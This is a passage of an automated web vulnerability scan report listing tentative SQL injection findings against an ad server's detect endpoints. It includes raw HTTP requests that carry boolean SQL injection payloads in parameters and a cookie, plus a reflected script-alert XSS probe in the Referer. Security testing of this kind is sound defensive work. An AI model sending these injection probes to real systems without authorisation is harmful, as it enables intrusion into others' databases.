Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087%20and%201%3d2--%20&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=onL6Y9wx3NQ0caaZaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:01 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.7. http://hfm.checkm8.com/adam/detect [dt cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detect

Issue detail

The dt cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692'%20and%201%3d1--%20; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:06 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wdH68Sv9UJ7MTba;Path=/;
Set-cookie: C=oML6Y9wx3NQ0caascSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228215787/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692'%20and%201%3d2--%20; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:06 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oML6Y9wx3NQ0caatcSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228215787/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.8. http://hfm.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:15 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=oxY5Y9wQKLW1caaBdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:34 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:15 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=oxY5Y9wQKLW1caaCdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:35 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.9. http://hfm.checkm8.com/adam/detect [req parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detect

Issue detail

The req parameter appears to be vulnerable to SQL injection attacks. The payloads 21397261'%20or%201%3d1--%20 and 21397261'%20or%201%3d2--%20 were each submitted in the req parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr21397261'%20or%201%3d1--%20&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:11 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=osY5Y9wQKLW1caa8cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:30 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr21397261'%20or%201%3d2--%20&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:11 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=osY5Y9wQKLW1caa9cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:30 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.10. http://hfm.checkm8.com/adam/detected [DATE parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detected

Issue detail

The DATE parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the DATE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917'%20and%201%3d1--%20&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:19 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oYL6Y9wdWQQ0caaGdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:38 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917'%20and%201%3d2--%20&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:19 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oYL6Y9wdWQQ0caaHdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:38 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.11. http://hfm.checkm8.com/adam/detected [FL parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detected

Issue detail

The FL parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the FL parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10'%20and%201%3d1--%20&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:49 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=o4Y5Y9wQKLW1caa0gSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:08 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10'%20and%201%3d2--%20&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:49 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=o4Y5Y9wQKLW1caa1gSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:08 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.12. http://hfm.checkm8.com/adam/detected [RES parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detected

Issue detail

The RES parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the RES parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21'%20and%201%3d1--%20&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:23 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: A=dqR5Y9wK67ULv9UJ7MTba;Path=/;
Set-cookie: C=o3L6Y9wUS38Scaa7dSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:43 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140303008/1214455850/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

